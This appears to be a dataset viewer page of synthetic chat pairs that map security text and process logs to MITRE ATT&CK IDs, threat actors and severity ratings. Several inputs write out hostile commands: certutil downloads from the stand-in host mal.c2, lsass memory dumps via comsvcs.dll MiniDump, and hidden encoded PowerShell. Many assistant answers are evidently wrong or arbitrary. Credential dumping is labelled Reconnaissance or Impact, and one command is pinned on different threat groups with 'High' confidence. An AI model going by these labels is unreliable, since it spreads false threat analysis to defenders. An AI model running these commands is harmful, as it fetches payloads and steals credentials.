messages listlengths 2 2 |
|---|
[
{
"content": "Identify the ATT&CK IDs present in the report below.\n\nInput: They may also search for debugger artifacts before dropping secondary or additional payloads.",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0005\", \"TA0007\"], \"techniques\": [\"T1622\"]}",
"role": "assistant"
... |
[
{
"content": "Extract Tactic (TA) and Technique (T) IDs from this threat description.\n\nInput: LightNeuron exfiltrates data over its email C2 channel.",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0010\"], \"techniques\": [\"T1041\"]}",
"role": "assistant"
}
] |
[
{
"content": "Identify the ATT&CK IDs present in the report below.\n\nInput: Egregor can perform a long sleep (greater than or equal to 3 minutes) to evade detection.",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0005\", \"TA0007\"], \"techniques\": [\"T1497\", \"T1497.003\"]}",
"role": ... |
[
{
"content": "Identify the ATT&CK IDs present in the report below.\n\nInput: Launch Agents can also be executed using the Launchctl command.",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0003\", \"TA0004\"], \"techniques\": [\"T1543.001\", \"T1543\"]}",
"role": "assistant"
}
] |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Ubuntu 22.04 system (DB-ORACLE-6POTOQ7O6V)\nNetwork Activity: TLSv1.3/TCP to cdn-content.com\nAttack Tactics: Exfiltration, Defense Evasion, Discovery",
"role": "user"
},
{
"... |
[
{
"content": "Identify the Tactic and Technique for this security event.\n\nInput: Process: certutil.exe executing: rundll32.exe comsvcs.dll, MiniDump 3749 C:\\temp\\lsass.dmp full\nNetwork: HTTP/TCP connection to 1.95.75.33",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0040\", \"TA0010\", \"... |
[
{
"content": "Identify the ATT&CK IDs present in the report below.\n\nInput: Monitor executed commands and arguments that may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment.",
"role": "user"
},
{
"c... |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: powershell.exe -nop -w hidden -enc JABkACAALQBlAH...\nEvasion Methods: WMI, LOLBin, TLS",
"role": "user"
},
{
"content": "{\"actor\": \"APT41\", \"confidence\": \"High\"}",
... |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: rundll32.exe comsvcs.dll, MiniDump 1571 C:\\temp\\lsass.dmp full\nEvasion Methods: Fileless, JA3 Spoof, LOLBin",
"role": "user"
},
{
"content": "{\"actor\": \"FIN7\", \"conf... |
[
{
"content": "Identify the Tactic and Technique for this security event.\n\nInput: Process: cmstp.exe executing: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nNetwork: TLSv1.2/TCP connection to 1.82.183.21",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0043\"], \"techn... |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nEvasion Methods: JA3 Spoof, LOLBin, Fileless",
"role": "user"
},
{
"content": "{\"actor\": \"Lapsus$\"... |
[
{
"content": "Extract Tactic (TA) and Technique (T) IDs from this threat description.\n\nInput: Monitor for unusual queries to the cloud provider's storage service.",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0007\", \"TA0009\"], \"techniques\": [\"T1619\", \"T1530\"]}",
"role": "assist... |
[
{
"content": "Extract Tactic (TA) and Technique (T) IDs from this threat description.\n\nInput: SDBbot has the ability to add a value to the Registry Run key to establish persistence if it detects it is running with regular user privilege.",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0003\",... |
[
{
"content": "Classify this cyber threat intelligence into MITRE ATT&CK labels.\n\nInput: Winnti for Windows can delete the DLLs for its various components from a compromised host.",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0005\"], \"techniques\": [\"T1070\", \"T1070.004\"]}",
"role":... |
[
{
"content": "Extract Tactic (TA) and Technique (T) IDs from this threat description.\n\nInput: Once the user enables macros, the macro will perform the following actions: Displays decoy content Checks for the existence of a file at %APPDATA%\\wscript.exe If %APPDATA%\\wscript.exe does not exist, the macro con... |
[
{
"content": "Map the following security event to MITRE ATT&CK tactics and techniques.\n\nInput: Process: wmic.exe executing: rundll32.exe comsvcs.dll, MiniDump 1738 C:\\temp\\lsass.dmp full\nNetwork: HTTP/TCP connection to 1.153.217.145",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0004\", \... |
[
{
"content": "Map the following security text to MITRE ATT&CK tactics and techniques.\n\nInput: Briba creates run key Registry entries pointing to malicious DLLs dropped to disk.",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0003\", \"TA0004\"], \"techniques\": [\"T1547.001\", \"T1547\"]}",
... |
[
{
"content": "Extract the ATT&CK IDs from this log data.\n\nInput: Process: rundll32.exe executing: powershell.exe -nop -w hidden -enc JABkACAALQBlAH...\nNetwork: TLSv1.2/TCP connection to 1.33.192.23",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0007\", \"TA0010\", \"TA0003\"], \"techniques\... |
[
{
"content": "Classify this cyber threat intelligence into MITRE ATT&CK labels.\n\nInput: If a domain within a forest is untrustworthy then it should not be a member of the forest.",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0004\", \"TA0005\"], \"techniques\": [\"T1134.005\", \"T1134\"]}",... |
[
{
"content": "Extract the ATT&CK IDs from this log data.\n\nInput: Process: bitsadmin.exe executing: rundll32.exe comsvcs.dll, MiniDump 1234 C:\\temp\\lsass.dmp full\nNetwork: TLSv1.3/TCP connection to 1.186.40.24",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0004\"], \"techniques\": [\"T1098... |
[
{
"content": "Extract the ATT&CK IDs from this log data.\n\nInput: Process: rundll32.exe executing: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nNetwork: HTTP/TCP connection to 1.177.116.14",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0002\"], \"techniques\": [\"T10... |
[
{
"content": "Map the following security event to MITRE ATT&CK tactics and techniques.\n\nInput: Process: certutil.exe executing: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nNetwork: HTTP/TCP connection to 1.107.236.234",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA... |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nEvasion Methods: LOLBin, Fileless, WMI",
"role": "user"
},
{
"content": "{\"actor\": \"FIN7\", \"confi... |
[
{
"content": "Identify the Tactic and Technique for this security event.\n\nInput: Process: powershell.exe executing: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nNetwork: TLSv1.2/TCP connection to 1.21.226.97",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0008\", \"T... |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows 11 system (WIN-FIN-SRV-QWCY1WC0YR)\nNetwork Activity: TLSv1.3/TCP to update.microsoft.com\nAttack Tactics: Initial Access, Command and Control",
"role": "user"
},
{
"... |
[
{
"content": "Extract the ATT&CK IDs from this log data.\n\nInput: Process: cmstp.exe executing: powershell.exe -nop -w hidden -enc JABkACAALQBlAH...\nNetwork: TLSv1.2/TCP connection to 1.173.25.81",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0009\"], \"techniques\": [\"T1071.001\"]}",
"... |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows Server 2022 system (APP-WEB-ALSB0D9MH4)\nNetwork Activity: HTTP/TCP to aws.amazon.com\nAttack Tactics: Impact, Persistence, Initial Access",
"role": "user"
},
{
"cont... |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows Server 2022 system (EC2-INST-UH17PDN9RN)\nNetwork Activity: TLSv1.2/TCP to github.com\nAttack Tactics: Persistence, Command and Control",
"role": "user"
},
{
"content... |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows Server 2022 system (IAM-ROLE-0U1NHL4P4K)\nNetwork Activity: TLSv1.2/TCP to github.com\nAttack Tactics: Command and Control, Execution, Initial Access",
"role": "user"
},
... |
[
{
"content": "Extract the ATT&CK IDs from this log data.\n\nInput: Process: certutil.exe executing: rundll32.exe comsvcs.dll, MiniDump 1588 C:\\temp\\lsass.dmp full\nNetwork: HTTP/TCP connection to 1.80.218.60",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0043\", \"TA0001\", \"TA0005\"], \"te... |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows 11 system (DB-ORACLE-BECNNLVP5O)\nNetwork Activity: TLSv1.3/TCP to aws.amazon.com\nAttack Tactics: Initial Access",
"role": "user"
},
{
"content": "{\"severity\": \"C... |
[
{
"content": "Extract the ATT&CK IDs from this log data.\n\nInput: Process: mshta.exe executing: rundll32.exe comsvcs.dll, MiniDump 2106 C:\\temp\\lsass.dmp full\nNetwork: HTTP/TCP connection to 1.162.46.155",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0007\", \"TA0004\"], \"techniques\": [\... |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Amazon Linux 2 system (APP-WEB-VWQ4CSG6K6)\nNetwork Activity: TLSv1.3/TCP to cdn-content.com\nAttack Tactics: Initial Access",
"role": "user"
},
{
"content": "{\"severity\": ... |
[
{
"content": "Identify the ATT&CK IDs present in the report below.\n\nInput: Imminent Monitor has a remote microphone monitoring capability.",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0009\"], \"techniques\": [\"T1123\"]}",
"role": "assistant"
}
] |
[
{
"content": "Map the following security text to MITRE ATT&CK tactics and techniques.\n\nInput: For example, on macOS systems log show --predicate 'process = \"sshd\"' can be used to review incoming SSH connection attempts for suspicious activity.",
"role": "user"
},
{
"content": "{\"tactics\": [\"T... |
[
{
"content": "Extract Tactic (TA) and Technique (T) IDs from this threat description.\n\nInput: Also, after retrieving a C2 IP address and Port Number, NETEAGLE will initiate a TCP connection to this socket.",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0011\"], \"techniques\": [\"T1095\"]}",... |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Ubuntu 22.04 system (IAM-ROLE-GOP2WN1SW4)\nNetwork Activity: TLSv1.3/TCP to cdn-content.com\nAttack Tactics: Credential Access, Lateral Movement, Reconnaissance",
"role": "user"
},... |
[
{
"content": "Extract Tactic (TA) and Technique (T) IDs from this threat description.\n\nInput: WarzoneRAT can use PowerShell to download files and execute commands.",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0002\"], \"techniques\": [\"T1059.001\", \"T1059\"]}",
"role": "assistant"
... |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nEvasion Methods: Base64, LOLBin, TLS",
"role": "user"
},
{
"content": "{\"actor\": \"Lapsus$\", \"conf... |
[
{
"content": "Map the following security text to MITRE ATT&CK tactics and techniques.\n\nInput: The following functions are called when the application attempts to initialize the menu:ETransaksi.Speed(); // Legitimate class, but method is the first wrapped function that leads to malicious code ProjectData.EndA... |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows 11 system (WIN-FIN-SRV-DNYFKU9ZKP)\nNetwork Activity: TLSv1.3/TCP to update.microsoft.com\nAttack Tactics: Collection, Persistence",
"role": "user"
},
{
"content": "{... |
[
{
"content": "Map the following security event to MITRE ATT&CK tactics and techniques.\n\nInput: Process: powershell.exe executing: powershell.exe -nop -w hidden -enc UQBvAHcAZQByAFMAaABlAGwAbAAgAC0A...\nNetwork: TLSv1.3/TCP connection to 1.41.194.137",
"role": "user"
},
{
"content": "{\"tactics\": ... |
[
{
"content": "Identify the Tactic and Technique for this security event.\n\nInput: Process: certutil.exe executing: powershell.exe -nop -w hidden -enc UQBvAHcAZQByAFMAaABlAGwAbAAgAC0A...\nNetwork: TLSv1.3/TCP connection to 1.144.65.248",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0008\", \"T... |
[
{
"content": "Identify the ATT&CK IDs present in the report below.\n\nInput: Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system.",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA... |
[
{
"content": "Extract Tactic (TA) and Technique (T) IDs from this threat description.\n\nInput: APT28 has used the Office Test persistence mechanism within Microsoft Office by adding the Registry key HKCU\\Software\\Microsoft\\Office test\\Special\\Perf to execute code.",
"role": "user"
},
{
"conten... |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows 11 system (IAM-ROLE-IHWY4UDVCR)\nNetwork Activity: HTTP/TCP to github.com\nAttack Tactics: Collection",
"role": "user"
},
{
"content": "{\"severity\": \"High\", \"bus... |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows 11 system (APP-WEB-CIYIBLLVD8)\nNetwork Activity: TLSv1.2/TCP to update.microsoft.com\nAttack Tactics: Collection",
"role": "user"
},
{
"content": "{\"severity\": \"H... |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nEvasion Methods: LOLBin, Base64, JA3 Spoof",
"role": "user"
},
{
"content": "{\"actor\": \"UNC4841\", ... |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows Server 2022 system (WIN-FIN-SRV-7ZCJZMT6LL)\nNetwork Activity: HTTP/TCP to update.microsoft.com\nAttack Tactics: Collection, Initial Access, Defense Evasion",
"role": "user"
... |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows 11 system (AZURE-VM-NZX85T33ZY)\nNetwork Activity: TLSv1.3/TCP to update.microsoft.com\nAttack Tactics: Collection",
"role": "user"
},
{
"content": "{\"severity\": \"... |
[
{
"content": "Map the following security text to MITRE ATT&CK tactics and techniques.\n\nInput: Honeybee uses a batch file that modifies Registry keys to launch a DLL into the svchost.exe process.",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0005\"], \"techniques\": [\"T1112\"]}",
"role"... |
[
{
"content": "Identify the Tactic and Technique for this security event.\n\nInput: Process: certutil.exe executing: powershell.exe -nop -w hidden -enc aWV4IChOZXctT2JqZWN0IE5ldC...\nNetwork: HTTP/TCP connection to 1.27.107.136",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0008\", \"TA0007\"],... |
[
{
"content": "Classify this cyber threat intelligence into MITRE ATT&CK labels.\n\nInput: HALFBAKED can obtain information about the OS, processor, and BIOS.",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0007\"], \"techniques\": [\"T1082\"]}",
"role": "assistant"
}
] |
[
{
"content": "Extract Tactic (TA) and Technique (T) IDs from this threat description.\n\nInput: KONNI has relied on a victim to enable malicious macros within an attachment delivered via email.",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0002\"], \"techniques\": [\"T1204.002\", \"T1204\"]}"... |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows Server 2022 system (AZURE-VM-LPT8XLOMI4)\nNetwork Activity: TLSv1.2/TCP to cdn-content.com\nAttack Tactics: Execution, Initial Access, Discovery",
"role": "user"
},
{
... |
[
{
"content": "Map the following security event to MITRE ATT&CK tactics and techniques.\n\nInput: Process: rundll32.exe executing: rundll32.exe comsvcs.dll, MiniDump 2494 C:\\temp\\lsass.dmp full\nNetwork: TLSv1.3/TCP connection to 1.115.13.102",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA000... |
[
{
"content": "Extract the ATT&CK IDs from this log data.\n\nInput: Process: rundll32.exe executing: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nNetwork: TLSv1.3/TCP connection to 1.114.49.219",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0043\"], \"techniques\": [\"... |
[
{
"content": "Identify the Tactic and Technique for this security event.\n\nInput: Process: rundll32.exe executing: rundll32.exe comsvcs.dll, MiniDump 1458 C:\\temp\\lsass.dmp full\nNetwork: TLSv1.2/TCP connection to 1.116.222.193",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0006\", \"TA0003... |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Amazon Linux 2 system (IAM-ROLE-IFUCIVLPCN)\nNetwork Activity: HTTP/TCP to update.microsoft.com\nAttack Tactics: Exfiltration, Privilege Escalation",
"role": "user"
},
{
"con... |
[
{
"content": "Classify this cyber threat intelligence into MITRE ATT&CK labels.\n\nInput: DarkWatchman has used an icon mimicking a text file to mask a malicious executable.",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0005\"], \"techniques\": [\"T1036\"]}",
"role": "assistant"
}
] |
[
{
"content": "Classify this cyber threat intelligence into MITRE ATT&CK labels.\n\nInput: Lazarus Group has also used various, often lesser known, functions to perform various types of Discovery and Process Injection.",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0002\"], \"techniques\": [\"T... |
[
{
"content": "Identify the Tactic and Technique for this security event.\n\nInput: Process: cmstp.exe executing: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nNetwork: TLSv1.2/TCP connection to 1.32.35.14",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0006\"], \"techni... |
[
{
"content": "Map the following security text to MITRE ATT&CK tactics and techniques.\n\nInput: Embedded functions Sleep, 15000 UrlDownloadToFile, https://upload.cat/0037e96c45ac2098?download_token=fa26750b7e73f0081c44831d0aaf9863c75592724dbc2f781ca495f9b5fbd4ac, %AppData%\\Microsoft\\Windows\\Picture2.exe 624... |
[
{
"content": "Extract Tactic (TA) and Technique (T) IDs from this threat description.\n\nInput: AppleJeus has added a leading . to plist filenames, unlisting them from the Finder app and default Terminal directory listings.",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0005\"], \"techniques\"... |
[
{
"content": "Map the following security text to MITRE ATT&CK tactics and techniques.\n\nInput: Darkhotel has used malware that is disguised as a Secure Shell (SSH) tool.",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0005\"], \"techniques\": [\"T1036.005\", \"T1036\"]}",
"role": "assistan... |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: powershell.exe -nop -w hidden -enc JABkACAALQBlAH...\nEvasion Methods: Fileless, WMI, Base64",
"role": "user"
},
{
"content": "{\"actor\": \"APT29\", \"confidence\": \"High\... |
[
{
"content": "Map the following security event to MITRE ATT&CK tactics and techniques.\n\nInput: Process: wmic.exe executing: rundll32.exe comsvcs.dll, MiniDump 1181 C:\\temp\\lsass.dmp full\nNetwork: TLSv1.3/TCP connection to 1.84.56.45",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0040\"], ... |
[
{
"content": "Extract Tactic (TA) and Technique (T) IDs from this threat description.\n\nInput: Avenger has the ability to browse files in directories such as Program Files and the Desktop.",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0007\"], \"techniques\": [\"T1083\"]}",
"role": "assi... |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: rundll32.exe comsvcs.dll, MiniDump 2236 C:\\temp\\lsass.dmp full\nEvasion Methods: JA3 Spoof, WMI, Base64",
"role": "user"
},
{
"content": "{\"actor\": \"Scattered Spider\",... |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows Server 2022 system (AZURE-VM-B5TLHAS71P)\nNetwork Activity: TLSv1.3/TCP to cdn-content.com\nAttack Tactics: Initial Access",
"role": "user"
},
{
"content": "{\"severi... |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: powershell.exe -nop -w hidden -enc JABkACAALQBlAH...\nEvasion Methods: Fileless, JA3 Spoof, Base64",
"role": "user"
},
{
"content": "{\"actor\": \"APT29\", \"confidence\": \... |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Ubuntu 22.04 system (DB-ORACLE-U999MOBCKM)\nNetwork Activity: TLSv1.3/TCP to aws.amazon.com\nAttack Tactics: Initial Access, Privilege Escalation, Defense Evasion",
"role": "user"
... |
[
{
"content": "Classify this cyber threat intelligence into MITRE ATT&CK labels.\n\nInput: Comnie achieves persistence by adding a shortcut of itself to the startup path in the Registry.",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0003\", \"TA0004\"], \"techniques\": [\"T1547.001\", \"T1547\... |
[
{
"content": "Classify this cyber threat intelligence into MITRE ATT&CK labels.\n\nInput: Similar to System Binary Proxy Execution, adversaries have also abused the Windows Task Scheduler to potentially mask one-time execution under signed/trusted system processes.",
"role": "user"
},
{
"content": "... |
[
{
"content": "Map the following security text to MITRE ATT&CK tactics and techniques.\n\nInput: Some systems may automatically restart critical applications and services when crashes occur, but they can likely be re-exploited to cause a persistent denial of service (DoS) condition.",
"role": "user"
},
{... |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: powershell.exe -nop -w hidden -enc aWV4IChOZXctT2JqZWN0IE5ldC...\nEvasion Methods: LOLBin, TLS, Base64",
"role": "user"
},
{
"content": "{\"actor\": \"Volt Typhoon\", \"conf... |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nEvasion Methods: Fileless, LOLBin, TLS",
"role": "user"
},
{
"content": "{\"actor\": \"APT29\", \"conf... |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: powershell.exe -nop -w hidden -enc aWV4IChOZXctT2JqZWN0IE5ldC...\nEvasion Methods: Base64, LOLBin, TLS",
"role": "user"
},
{
"content": "{\"actor\": \"Mustang Panda\", \"con... |
[
{
"content": "Classify this cyber threat intelligence into MITRE ATT&CK labels.\n\nInput: PowerShell supports several profiles depending on the user or host program.",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0003\", \"TA0004\"], \"techniques\": [\"T1546.013\", \"T1546\"]}",
"role": "a... |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Amazon Linux 2 system (IAM-ROLE-I6YMRNTOO3)\nNetwork Activity: TLSv1.2/TCP to cdn-content.com\nAttack Tactics: Impact",
"role": "user"
},
{
"content": "{\"severity\": \"Extre... |
[
{
"content": "Map the following security text to MITRE ATT&CK tactics and techniques.\n\nInput: Carbanak exfiltrates data in compressed chunks if a message is larger than 4096 bytes .",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0010\"], \"techniques\": [\"T1030\"]}",
"role": "assistant"... |
[
{
"content": "Map the following security text to MITRE ATT&CK tactics and techniques.\n\nInput: overwrite or delete MBR in same sentence",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0040\"], \"techniques\": [\"T1561\", \"T1561.002\"]}",
"role": "assistant"
}
] |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: rundll32.exe comsvcs.dll, MiniDump 1008 C:\\temp\\lsass.dmp full\nEvasion Methods: Fileless, WMI, LOLBin",
"role": "user"
},
{
"content": "{\"actor\": \"Lapsus$\", \"confide... |
[
{
"content": "Identify the ATT&CK IDs present in the report below.\n\nInput: Adversaries may also include links that are intended to interact directly with an email reader, including embedded images intended to exploit the end system directly or verify the receipt of an email ( web bugs/web beacons).",
"rol... |
[
{
"content": "Extract Tactic (TA) and Technique (T) IDs from this threat description.\n\nInput: Look for inconsistencies between the various fields that store PPID information, such as the EventHeader ProcessId from data collected via Event Tracing for Windows (ETW), Creator Process ID/Name from Windows event l... |
[
{
"content": "Classify this cyber threat intelligence into MITRE ATT&CK labels.\n\nInput: Zeus Panda checks for running processes on the victim’s machine.",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0007\"], \"techniques\": [\"T1057\"]}",
"role": "assistant"
}
] |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: rundll32.exe comsvcs.dll, MiniDump 2001 C:\\temp\\lsass.dmp full\nEvasion Methods: JA3 Spoof, Fileless, TLS",
"role": "user"
},
{
"content": "{\"actor\": \"UNC4841\", \"conf... |
[
{
"content": "Identify the ATT&CK IDs present in the report below.\n\nInput: A 256-bit AES session key is generated and used to encrypt both message headers and bodies separately",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0011\"], \"techniques\": [\"T1573\"]}",
"role": "assistant"
}
... |
[
{
"content": "Identify the Tactic and Technique for this security event.\n\nInput: Process: bitsadmin.exe executing: powershell.exe -nop -w hidden -enc JABkACAALQBlAH...\nNetwork: TLSv1.2/TCP connection to 1.73.17.151",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0043\"], \"techniques\": [\"T... |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: rundll32.exe comsvcs.dll, MiniDump 2796 C:\\temp\\lsass.dmp full\nEvasion Methods: JA3 Spoof, Base64, TLS",
"role": "user"
},
{
"content": "{\"actor\": \"APT41\", \"confiden... |
[
{
"content": "Identify the ATT&CK IDs present in the report below.\n\nInput: Adversaries may employ various user activity checks to detect and avoid virtualization and analysis environments.",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0005\", \"TA0007\"], \"techniques\": [\"T1497\", \"T1497... |
[
{
"content": "Map the following security text to MITRE ATT&CK tactics and techniques.\n\nInput: FIN7 has collected files and other sensitive information from a compromised network.",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0009\"], \"techniques\": [\"T1005\"]}",
"role": "assistant"
... |
[
{
"content": "Classify this cyber threat intelligence into MITRE ATT&CK labels.\n\nInput: Monitor for unusual kernel driver installation activity may erase the contents of storage devices on specific systems or in large numbers in a network to interrupt availability to system and network resources.",
"role"... |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: powershell.exe -nop -w hidden -enc UQBvAHcAZQByAFMAaABlAGwAbAAgAC0A...\nEvasion Methods: LOLBin, Base64, JA3 Spoof",
"role": "user"
},
{
"content": "{\"actor\": \"Volt Typho... |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: rundll32.exe comsvcs.dll, MiniDump 1038 C:\\temp\\lsass.dmp full\nEvasion Methods: Fileless, Base64, WMI",
"role": "user"
},
{
"content": "{\"actor\": \"APT29\", \"confidenc... |
[
{
"content": "Map the following security event to MITRE ATT&CK tactics and techniques.\n\nInput: Process: wmic.exe executing: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nNetwork: TLSv1.3/TCP connection to 1.151.46.49",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA000... |
[
{
"content": "Identify the ATT&CK IDs present in the report below.\n\nInput: (Source: SecureWorks) Reentry attempt After BRONZE UNION was evicted from a compromised environment, which involved blocking the group's known infrastructure, CTU researchers observed the group attempting to reconnect to its OWA web sh... |
[
{
"content": "Extract Tactic (TA) and Technique (T) IDs from this threat description.\n\nInput: Monitor newly executed processes that may gain persistence and elevate privileges by executing malicious content triggered by the Event Monitor Daemon (emond).",
"role": "user"
},
{
"content": "{\"tactics... |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nEvasion Methods: TLS, Base64, WMI",
"role": "user"
},
{
"content": "{\"actor\": \"FIN7\", \"confidence... |
[
{
"content": "Extract the ATT&CK IDs from this log data.\n\nInput: Process: wmic.exe executing: powershell.exe -nop -w hidden -enc JABkACAALQBlAH...\nNetwork: HTTP/TCP connection to 1.31.246.203",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0002\", \"TA0009\", \"TA0010\"], \"techniques\": [\"... |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.